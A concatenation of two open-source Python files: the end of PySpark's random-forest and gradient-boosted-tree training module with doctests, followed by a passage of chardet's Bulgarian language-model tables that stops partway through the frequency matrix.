TreeEnsembleModel classifier with 3 trees
<BLANKLINE>
Tree 0:
Predict: 1.0
Tree 1:
If (feature 0 <= 1.5)
Predict: 0.0
Else (feature 0 > 1.5)
Predict: 1.0
Tree 2:
If (feature 0 <= 1.5)
Predict: 0.0
Else (feature 0 > 1.5)
Predict: 1.0
<BLANKLINE>
>>> model.predict([2.0])
1.0
>>> model.predict([0.0])
0.0
>>> rdd = sc.parallelize([[3.0], [1.0]])
>>> model.predict(rdd).collect()
[1.0, 0.0]
"""
return cls._train(data, "classification", numClasses,
categoricalFeaturesInfo, numTrees, featureSubsetStrategy, impurity,
maxDepth, maxBins, seed)
@classmethod
@since("1.2.0")
def trainRegressor(cls, data, categoricalFeaturesInfo, numTrees, featureSubsetStrategy="auto",
impurity="variance", maxDepth=4, maxBins=32, seed=None):
"""
Train a random forest model for regression.
:param data:
Training dataset: RDD of LabeledPoint. Labels are real numbers.
:param categoricalFeaturesInfo:
Map storing arity of categorical features. An entry (n -> k)
indicates that feature n is categorical with k categories
indexed from 0: {0, 1, ..., k-1}.
:param numTrees:
Number of trees in the random forest.
:param featureSubsetStrategy:
Number of features to consider for splits at each node.
Supported values: "auto", "all", "sqrt", "log2", "onethird".
If "auto" is set, this parameter is set based on numTrees:
if numTrees == 1, set to "all";
            if numTrees > 1 (forest), set to "onethird" for regression.
(default: "auto")
:param impurity:
Criterion used for information gain calculation.
The only supported value for regression is "variance".
(default: "variance")
:param maxDepth:
Maximum depth of tree (e.g. depth 0 means 1 leaf node, depth 1
means 1 internal node + 2 leaf nodes).
(default: 4)
:param maxBins:
Maximum number of bins used for splitting features.
(default: 32)
:param seed:
Random seed for bootstrapping and choosing feature subsets.
Set as None to generate seed based on system time.
(default: None)
:return:
RandomForestModel that can be used for prediction.
Example usage:
>>> from pyspark.mllib.regression import LabeledPoint
>>> from pyspark.mllib.tree import RandomForest
>>> from pyspark.mllib.linalg import SparseVector
>>>
>>> sparse_data = [
... LabeledPoint(0.0, SparseVector(2, {0: 1.0})),
... LabeledPoint(1.0, SparseVector(2, {1: 1.0})),
... LabeledPoint(0.0, SparseVector(2, {0: 1.0})),
... LabeledPoint(1.0, SparseVector(2, {1: 2.0}))
... ]
>>>
>>> model = RandomForest.trainRegressor(sc.parallelize(sparse_data), {}, 2, seed=42)
>>> model.numTrees()
2
>>> model.totalNumNodes()
4
>>> model.predict(SparseVector(2, {1: 1.0}))
1.0
>>> model.predict(SparseVector(2, {0: 1.0}))
0.5
>>> rdd = sc.parallelize([[0.0, 1.0], [1.0, 0.0]])
>>> model.predict(rdd).collect()
[1.0, 0.5]
"""
return cls._train(data, "regression", 0, categoricalFeaturesInfo, numTrees,
featureSubsetStrategy, impurity, maxDepth, maxBins, seed)
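def _example_feature_subset_strategy(labeled_points):
    # Hedged sketch, not part of the original module: contrasts the "auto"
    # strategy (which the docstring above says resolves to "onethird" for a
    # multi-tree regressor) with an explicit "sqrt". `labeled_points` is an
    # assumed RDD of LabeledPoint; a fixed seed keeps the comparison repeatable.
    auto_model = RandomForest.trainRegressor(
        labeled_points, {}, numTrees=10, featureSubsetStrategy="auto", seed=42)
    sqrt_model = RandomForest.trainRegressor(
        labeled_points, {}, numTrees=10, featureSubsetStrategy="sqrt", seed=42)
    return auto_model, sqrt_model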
@inherit_doc
class GradientBoostedTreesModel(TreeEnsembleModel, JavaLoader):
"""
Represents a gradient-boosted tree model.
.. versionadded:: 1.3.0
"""
@classmethod
def _java_loader_class(cls):
return "org.apache.spark.mllib.tree.model.GradientBoostedTreesModel"
class GradientBoostedTrees(object):
"""
Learning algorithm for a gradient boosted trees model for
classification or regression.
.. versionadded:: 1.3.0
"""
@classmethod
def _train(cls, data, algo, categoricalFeaturesInfo,
loss, numIterations, learningRate, maxDepth, maxBins):
first = data.first()
assert isinstance(first, LabeledPoint), "the data should be RDD of LabeledPoint"
model = callMLlibFunc("trainGradientBoostedTreesModel", data, algo, categoricalFeaturesInfo,
loss, numIterations, learningRate, maxDepth, maxBins)
return GradientBoostedTreesModel(model)
@classmethod
@since("1.3.0")
def trainClassifier(cls, data, categoricalFeaturesInfo,
loss="logLoss", numIterations=100, learningRate=0.1, maxDepth=3,
maxBins=32):
"""
Train a gradient-boosted trees model for classification.
:param data:
Training dataset: RDD of LabeledPoint. Labels should take values
{0, 1}.
:param categoricalFeaturesInfo:
Map storing arity of categorical features. An entry (n -> k)
indicates that feature n is categorical with k categories
indexed from 0: {0, 1, ..., k-1}.
:param loss:
Loss function used for minimization during gradient boosting.
Supported values: "logLoss", "leastSquaresError",
"leastAbsoluteError".
(default: "logLoss")
:param numIterations:
Number of iterations of boosting.
(default: 100)
:param learningRate:
Learning rate for shrinking the contribution of each estimator.
            The learning rate should be in the interval (0, 1].
(default: 0.1)
:param maxDepth:
Maximum depth of tree (e.g. depth 0 means 1 leaf node, depth 1
means 1 internal node + 2 leaf nodes).
(default: 3)
:param maxBins:
Maximum number of bins used for splitting features. DecisionTree
requires maxBins >= max categories.
(default: 32)
:return:
GradientBoostedTreesModel that can be used for prediction.
Example usage:
>>> from pyspark.mllib.regression import LabeledPoint
>>> from pyspark.mllib.tree import GradientBoostedTrees
>>>
>>> data = [
... LabeledPoint(0.0, [0.0]),
... LabeledPoint(0.0, [1.0]),
... LabeledPoint(1.0, [2.0]),
... LabeledPoint(1.0, [3.0])
... ]
>>>
>>> model = GradientBoostedTrees.trainClassifier(sc.parallelize(data), {}, numIterations=10)
>>> model.numTrees()
10
>>> model.totalNumNodes()
30
>>> print(model) # it already has newline
TreeEnsembleModel classifier with 10 trees
<BLANKLINE>
>>> model.predict([2.0])
1.0
>>> model.predict([0.0])
0.0
>>> rdd = sc.parallelize([[2.0], [0.0]])
>>> model.predict(rdd).collect()
[1.0, 0.0]
"""
return cls._train(data, "classification", categoricalFeaturesInfo,
loss, numIterations, learningRate, maxDepth, maxBins)
@classmethod
@since("1.3.0")
def trainRegressor(cls, data, categoricalFeaturesInfo,
loss="leastSquaresError", numIterations=100, learningRate=0.1, maxDepth=3,
maxBins=32):
"""
Train a gradient-boosted trees model for regression.
:param data:
Training dataset: RDD of LabeledPoint. Labels are real numbers.
:param categoricalFeaturesInfo:
Map storing arity of categorical features. An entry (n -> k)
indicates that feature n is categorical with k categories
indexed from 0: {0, 1, ..., k-1}.
:param loss:
Loss function used for minimization during gradient boosting.
Supported values: "logLoss", "leastSquaresError",
"leastAbsoluteError".
(default: "leastSquaresError")
:param numIterations:
Number of iterations of boosting.
(default: 100)
:param learningRate:
Learning rate for shrinking the contribution of each estimator.
            The learning rate should be in the interval (0, 1].
(default: 0.1)
:param maxDepth:
Maximum depth of tree (e.g. depth 0 means 1 leaf node, depth 1
means 1 internal node + 2 leaf nodes).
(default: 3)
:param maxBins:
Maximum number of bins used for splitting features. DecisionTree
requires maxBins >= max categories.
(default: 32)
:return:
GradientBoostedTreesModel that can be used for prediction.
Example usage:
>>> from pyspark.mllib.regression import LabeledPoint
>>> from pyspark.mllib.tree import GradientBoostedTrees
>>> from pyspark.mllib.linalg import SparseVector
>>>
>>> sparse_data = [
... LabeledPoint(0.0, SparseVector(2, {0: 1.0})),
... LabeledPoint(1.0, SparseVector(2, {1: 1.0})),
... LabeledPoint(0.0, SparseVector(2, {0: 1.0})),
... LabeledPoint(1.0, SparseVector(2, {1: 2.0}))
... ]
>>>
>>> data = sc.parallelize(sparse_data)
>>> model = GradientBoostedTrees.trainRegressor(data, {}, numIterations=10)
>>> model.numTrees()
10
>>> model.totalNumNodes()
12
>>> model.predict(SparseVector(2, {1: 1.0}))
1.0
>>> model.predict(SparseVector(2, {0: 1.0}))
0.0
>>> rdd = sc.parallelize([[0.0, 1.0], [1.0, 0.0]])
>>> model.predict(rdd).collect()
[1.0, 0.0]
"""
return cls._train(data, "regression", categoricalFeaturesInfo,
loss, numIterations, learningRate, maxDepth, maxBins)
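def _example_gbt_shrinkage(labeled_points):
    # Hedged sketch, not part of the original module: a smaller learningRate
    # shrinks each tree's contribution, which typically needs more boosting
    # iterations to reach a comparable training error. `labeled_points` is an
    # assumed RDD of LabeledPoint.
    coarse = GradientBoostedTrees.trainRegressor(
        labeled_points, {}, learningRate=0.5, numIterations=10)
    fine = GradientBoostedTrees.trainRegressor(
        labeled_points, {}, learningRate=0.05, numIterations=100)
    return coarse, fine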
def _test():
import doctest
globs = globals().copy()
from pyspark.sql import SparkSession
spark = SparkSession.builder\
.master("local[4]")\
.appName("mllib.tree tests")\
.getOrCreate()
globs['sc'] = spark.sparkContext
(failure_count, test_count) = doctest.testmod(globs=globs, optionflags=doctest.ELLIPSIS)
spark.stop()
if failure_count:
sys.exit(-1)
if __name__ == "__main__":
_test()
| apache-2.0 |
sjsucohort6/openstack | python/venv/lib/python2.7/site-packages/pip/_vendor/requests/packages/chardet/langbulgarianmodel.py | 2965 | 12784 | ######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Communicator client code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
# 255: Control characters that usually do not exist in any text
# 254: Carriage/Return
# 253: symbols (punctuation) that do not belong to a word
# 252: 0 - 9
# Character Mapping Table:
# this table is modified based on win1251BulgarianCharToOrderMap, so
# only numbers below 64 are certainly valid
Latin5_BulgarianCharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30
253, 77, 90, 99,100, 72,109,107,101, 79,185, 81,102, 76, 94, 82, # 40
110,186,108, 91, 74,119, 84, 96,111,187,115,253,253,253,253,253, # 50
253, 65, 69, 70, 66, 63, 68,112,103, 92,194,104, 95, 86, 87, 71, # 60
116,195, 85, 93, 97,113,196,197,198,199,200,253,253,253,253,253, # 70
194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209, # 80
210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225, # 90
81,226,227,228,229,230,105,231,232,233,234,235,236, 45,237,238, # a0
31, 32, 35, 43, 37, 44, 55, 47, 40, 59, 33, 46, 38, 36, 41, 30, # b0
39, 28, 34, 51, 48, 49, 53, 50, 54, 57, 61,239, 67,240, 60, 56, # c0
1, 18, 9, 20, 11, 3, 23, 15, 2, 26, 12, 10, 14, 6, 4, 13, # d0
7, 8, 5, 19, 29, 25, 22, 21, 27, 24, 17, 75, 52,241, 42, 16, # e0
62,242,243,244, 58,245, 98,246,247,248,249,250,251, 91,252,253, # f0
)
win1251BulgarianCharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30
253, 77, 90, 99,100, 72,109,107,101, 79,185, 81,102, 76, 94, 82, # 40
110,186,108, 91, 74,119, 84, 96,111,187,115,253,253,253,253,253, # 50
253, 65, 69, 70, 66, 63, 68,112,103, 92,194,104, 95, 86, 87, 71, # 60
116,195, 85, 93, 97,113,196,197,198,199,200,253,253,253,253,253, # 70
206,207,208,209,210,211,212,213,120,214,215,216,217,218,219,220, # 80
221, 78, 64, 83,121, 98,117,105,222,223,224,225,226,227,228,229, # 90
88,230,231,232,233,122, 89,106,234,235,236,237,238, 45,239,240, # a0
73, 80,118,114,241,242,243,244,245, 62, 58,246,247,248,249,250, # b0
31, 32, 35, 43, 37, 44, 55, 47, 40, 59, 33, 46, 38, 36, 41, 30, # c0
39, 28, 34, 51, 48, 49, 53, 50, 54, 57, 61,251, 67,252, 60, 56, # d0
1, 18, 9, 20, 11, 3, 23, 15, 2, 26, 12, 10, 14, 6, 4, 13, # e0
7, 8, 5, 19, 29, 25, 22, 21, 27, 24, 17, 75, 52,253, 42, 16, # f0
)
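# Hedged sketch, not part of the original module: how a prober consults one of
# the char-to-order maps above. A raw byte value indexes the tuple; per the
# comments at the top, 255/254/253/252 mark control/CR/symbol/digit bytes
# rather than frequency ranks.
def _example_char_order(byte_value, order_map=win1251BulgarianCharToOrderMap):
    order = order_map[byte_value]
    # Assuming chardet's SAMPLE_SIZE of 64, only ranks below 64 feed the
    # bigram precedence matrix.
    return order if order < 64 else None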
# Model Table:
# total sequences: 100%
# first 512 sequences: 96.9392%
# first 1024 sequences: 3.0618%
# rest sequences: 0.2992%
# negative sequences: 0.0020%
BulgarianLangModel = (
0,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,3,3,3,3,3,3,3,3,2,3,3,3,3,3,
3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,0,3,3,3,2,2,3,2,2,1,2,2,
3,1,3,3,2,3,3,3,3,3,3,3,3,3,3,3,3,0,3,3,3,3,3,3,3,3,3,3,0,3,0,1,
0,0,0,0,0,0,0,0,0,0,1,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,
3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,3,2,3,3,3,3,3,3,3,3,0,3,1,0,
0,1,0,0,0,0,0,0,0,0,1,1,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,
3,2,2,2,3,3,3,3,3,3,3,3,3,3,3,3,3,1,3,2,3,3,3,3,3,3,3,3,0,3,0,0,
0,0,0,0,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,2,3,3,2,3,3,3,3,3,3,3,3,3,3,3,3,1,3,2,3,3,3,3,3,3,3,3,0,3,0,0,
0,0,0,0,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,3,3,3,3,3,2,3,2,2,1,3,3,3,3,2,2,2,1,1,2,0,1,0,1,0,0,
0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,1,
3,3,3,3,3,3,3,2,3,2,2,3,3,1,1,2,3,3,2,3,3,3,3,2,1,2,0,2,0,3,0,0,
0,0,0,0,0,0,0,1,0,0,2,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,1,
3,3,3,3,3,3,3,1,3,3,3,3,3,2,3,2,3,3,3,3,3,2,3,3,1,3,0,3,0,2,0,0,
0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,
3,3,3,3,3,3,3,3,1,3,3,2,3,3,3,1,3,3,2,3,2,2,2,0,0,2,0,2,0,2,0,0,
0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,1,
3,3,3,3,3,3,3,3,3,0,3,3,3,2,2,3,3,3,1,2,2,3,2,1,1,2,0,2,0,0,0,0,
1,0,0,0,0,0,0,0,0,0,2,0,0,1,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,
3,3,3,3,3,3,3,2,3,3,1,2,3,2,2,2,3,3,3,3,3,2,2,3,1,2,0,2,1,2,0,0,
0,0,0,0,0,0,0,0,0,0,3,0,0,1,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,1,
3,3,3,3,3,1,3,3,3,3,3,2,3,3,3,2,3,3,2,3,2,2,2,3,1,2,0,1,0,1,0,0,
0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,
3,3,3,3,3,3,3,3,3,3,3,1,1,1,2,2,1,3,1,3,2,2,3,0,0,1,0,1,0,1,0,0,
0,0,0,1,0,0,0,0,1,0,2,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,
3,3,3,3,3,2,2,3,2,2,3,1,2,1,1,1,2,3,1,3,1,2,2,0,1,1,1,1,0,1,0,0,
0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,
3,3,3,3,3,1,3,2,2,3,3,1,2,3,1,1,3,3,3,3,1,2,2,1,1,1,0,2,0,2,0,1,
0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,
3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,1,2,2,3,3,3,2,2,1,1,2,0,2,0,1,0,0,
0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,
3,0,1,2,1,3,3,2,3,3,3,3,3,2,3,2,1,0,3,1,2,1,2,1,2,3,2,1,0,1,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
1,1,1,2,3,3,3,3,3,3,3,3,3,3,3,3,0,0,3,1,3,3,2,3,3,2,2,2,0,1,0,0,
0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,3,3,3,3,0,3,3,3,3,3,2,1,1,2,1,3,3,0,3,1,1,1,1,3,2,0,1,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,
3,3,2,2,2,3,3,3,3,3,3,3,3,3,3,3,1,1,3,1,3,3,2,3,2,2,2,3,0,2,0,0,
0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,2,3,3,2,2,3,2,1,1,1,1,1,3,1,3,1,1,0,0,0,1,0,0,0,1,0,0,
0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,2,3,2,0,3,2,0,3,0,2,0,0,2,1,3,1,0,0,1,0,0,0,1,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,
3,3,3,3,2,1,1,1,1,2,1,1,2,1,1,1,2,2,1,2,1,1,1,0,1,1,0,1,0,1,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,
3,3,3,3,2,1,3,1,1,2,1,3,2,1,1,0,1,2,3,2,1,1,1,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,3,3,3,3,2,2,1,0,1,0,0,1,0,0,0,2,1,0,3,0,0,1,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,
3,3,3,2,3,2,3,3,1,3,2,1,1,1,2,1,1,2,1,3,0,1,0,0,0,1,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,1,1,2,2,3,3,2,3,2,2,2,3,1,2,2,1,1,2,1,1,2,2,0,1,1,0,1,0,2,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,2,1,3,1,0,2,2,1,3,2,1,0,0,2,0,2,0,1,0,0,0,0,0,0,0,1,0,0,
0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,
3,3,3,3,3,3,1,2,0,2,3,1,2,3,2,0,1,3,1,2,1,1,1,0,0,1,0,0,2,2,2,3,
2,2,2,2,1,2,1,1,2,2,1,1,2,0,1,1,1,0,0,1,1,0,0,1,1,0,0,0,1,1,0,1,
3,3,3,3,3,2,1,2,2,1,2,0,2,0,1,0,1,2,1,2,1,1,0,0,0,1,0,1,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,1,
3,3,2,3,3,1,1,3,1,0,3,2,1,0,0,0,1,2,0,2,0,1,0,0,0,1,0,1,2,1,2,2,
1,1,1,1,1,1,1,2,2,2,1,1,1,1,1,1,1,0,1,2,1,1,1,0,0,0,0,0,1,1,0,0,
3,1,0,1,0,2,3,2,2,2,3,2,2,2,2,2,1,0,2,1,2,1,1,1,0,1,2,1,2,2,2,1,
1,1,2,2,2,2,1,2,1,1,0,1,2,1,2,2,2,1,1,1,0,1,1,1,1,2,0,1,0,0,0,0,
2,3,2,3,3,0,0,2,1,0,2,1,0,0,0,0,2,3,0,2,0,0,0,0,0,1,0,0,2,0,1,2,
2,1,2,1,2,2,1,1,1,2,1,1,1,0,1,2,2,1,1,1,1,1,0,1,1,1,0,0,1,2,0,0,
3,3,2,2,3,0,2,3,1,1,2,0,0,0,1,0,0,2,0,2,0,0,0,1,0,1,0,1,2,0,2,2,
1,1,1,1,2,1,0,1,2,2,2,1,1,1,1,1,1,1,0,1,1,1,0,0,0,0,0,0,1,1,0,0,
2,3,2,3,3,0,0,3,0,1,1,0,1,0,0,0,2,2,1,2,0,0,0,0,0,0,0,0,2,0,1,2,
2,2,1,1,1,1,1,2,2,2,1,0,2,0,1,0,1,0,0,1,0,1,0,0,1,0,0,0,0,1,0,0,
3,3,3,3,2,2,2,2,2,0,2,1,1,1,1,2,1,2,1,1,0,2,0,1,0,1,0,0,2,0,1,2,
1,1,1,1,1,1,1,2,2,1,1,0,2,0,1,0,2,0,0,1,1,1,0,0,2,0,0,0,1,1,0,0,
2,3,3,3,3,1,0,0,0,0,0,0,0,0,0,0,2,0,0,1,1,0,0,0,0,0,0,1,2,0,1,2,
2,2,2,1,1,2,1,1,2,2,2,1,2,0,1,1,1,1,1,1,0,1,1,1,1,0,0,1,1,1,0,0,
2,3,3,3,3,0,2,2,0,2,1,0,0,0,1,1,1,2,0,2,0,0,0,3,0,0,0,0,2,0,2,2,
1,1,1,2,1,2,1,1,2,2,2,1,2,0,1,1,1,0,1,1,1,1,0,2,1,0,0,0,1,1,0,0,
2,3,3,3,3,0,2,1,0,0,2,0,0,0,0,0,1,2,0,2,0,0,0,0,0,0,0,0,2,0,1,2,
1,1,1,2,1,1,1,1,2,2,2,0,1,0,1,1,1,0,0,1,1,1,0,0,1,0,0,0,0,1,0,0,
3,3,2,2,3,0,1,0,1,0,0,0,0,0,0,0,1,1,0,3,0,0,0,0,0,0,0,0,1,0,2,2,
1,1,1,1,1,2,1,1,2,2,1,2,2,1,0,1,1,1,1,1,0,1,0,0,1,0,0,0,1,1,0,0,
3,1,0,1,0,2,2,2,2,3,2,1,1,1,2,3,0,0,1,0,2,1,1,0,1,1,1,1,2,1,1,1,
1,2,2,1,2,1,2,2,1,1,0,1,2,1,2,2,1,1,1,0,0,1,1,1,2,1,0,1,0,0,0,0,
2,1,0,1,0,3,1,2,2,2,2,1,2,2,1,1,1,0,2,1,2,2,1,1,2,1,1,0,2,1,1,1,
1,2,2,2,2,2,2,2,1,2,0,1,1,0,2,1,1,1,1,1,0,0,1,1,1,1,0,1,0,0,0,0,
2,1,1,1,1,2,2,2,2,1,2,2,2,1,2,2,1,1,2,1,2,3,2,2,1,1,1,1,0,1,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,2,2,3,2,0,1,2,0,1,2,1,1,0,1,0,1,2,1,2,0,0,0,1,1,0,0,0,1,0,0,2,
1,1,0,0,1,1,0,1,1,1,1,0,2,0,1,1,1,0,0,1,1,0,0,0,0,1,0,0,0,1,0,0,
2,0,0,0,0,1,2,2,2,2,2,2,2,1,2,1,1,1,1,1,1,1,0,1,1,1,1,1,2,1,1,1,
1,2,2,2,2,1,1,2,1,2,1,1,1,0,2,1,2,1,1,1,0,2,1,1,1,1,0,1,0,0,0,0,
3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,1,0,
1,1,0,1,0,1,1,1,1,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,2,2,3,2,0,0,0,0,1,0,0,0,0,0,0,1,1,0,2,0,0,0,0,0,0,0,0,1,0,1,2,
1,1,1,1,1,1,0,0,2,2,2,2,2,0,1,1,0,1,1,1,1,1,0,0,1,0,0,0,1,1,0,1,
2,3,1,2,1,0,1,1,0,2,2,2,0,0,1,0,0,1,1,1,1,0,0,0,0,0,0,0,1,0,1,2,
1,1,1,1,2,1,1,1,1,1,1,1,1,0,1,1,0,1,0,1,0,1,0,0,1,0,0,0,0,1,0,0,
2,2,2,2,2,0,0,2,0,0,2,0,0,0,0,0,0,1,0,1,0,0,0,0,0,0,0,0,2,0,2,2,
1,1,1,1,1,0,0,1,2,1,1,0,1,0,1,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,
1,2,2,2,2,0,0,2,0,1,1,0,0,0,1,0,0,2,0,2,0,0,0,0,0,0,0,0,0,0,1,1,
0,0,0,1,1,1,1,1,1,1,1,1,1,0,1,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,
1,2,2,3,2,0,0,1,0,0,1,0,0,0,0,0,0,1,0,2,0,0,0,1,0,0,0,0,0,0,0,2,
1,1,0,0,1,0,0,0,1,1,0,0,1,0,1,1,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,
2,1,2,2,2,1,2,1,2,2,1,1,2,1,1,1,0,1,1,1,1,2,0,1,0,1,1,1,1,0,1,1,
1,1,2,1,1,1,1,1,1,0,0,1,2,1,1,1,1,1,1,0,0,1,1,1,0,0,0,0,0,0,0,0,
1,0,0,1,3,1,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,2,2,2,1,0,0,1,0,2,0,0,0,0,0,1,1,1,0,1,0,0,0,0,0,0,0,0,2,0,0,1,
0,2,0,1,0,0,1,1,2,0,1,0,1,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,
1,2,2,2,2,0,1,1,0,2,1,0,1,1,1,0,0,1,0,2,0,1,0,0,0,0,0,0,0,0,0,1,
0,1,0,0,1,0,0,0,1,1,0,0,1,0,0,1,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,
2,2,2,2,2,0,0,1,0,0,0,1,0,1,0,0,0,1,0,1,0,0,0,0,0,0,0,0,0,0,0,1,
0,1,0,1,1,1,0,0,1,1,1,0,1,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,
2,0,1,0,0,1,2,1,1,1,1,1,1,2,2,1,0,0,1,0,1,0,0,0,0,1,1,1,1,0,0,0,
1,1,2,1,1,1,1,0,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,2,1,2,1,0,0,1,0,0,0,0,0,0,0,0,1,1,0,1,0,0,0,0,0,0,0,0,0,0,0,1,
0,0,0,0,0,0,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
1,0,0,1,2,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,0,0,0,
0,1,1,0,1,1,1,0,0,1,0,0,1,0,1,0,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,
1,0,1,0,0,1,1,1,1,1,1,1,1,1,1,1,0,0,1,0,2,0,0,2,0,1,0,0,1,0,0,1,
1,1,0,0,1,1,0,1,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,1,0,
1,1,1,1,1,1,1,2,0,0,0,0,0,0,2,1,0,1,1,0,0,1,1,1,0,1,0,0,0,0,0,0,
2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
1,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1,0,1,1,0,1,1,1,1,1,0,1,0,0,
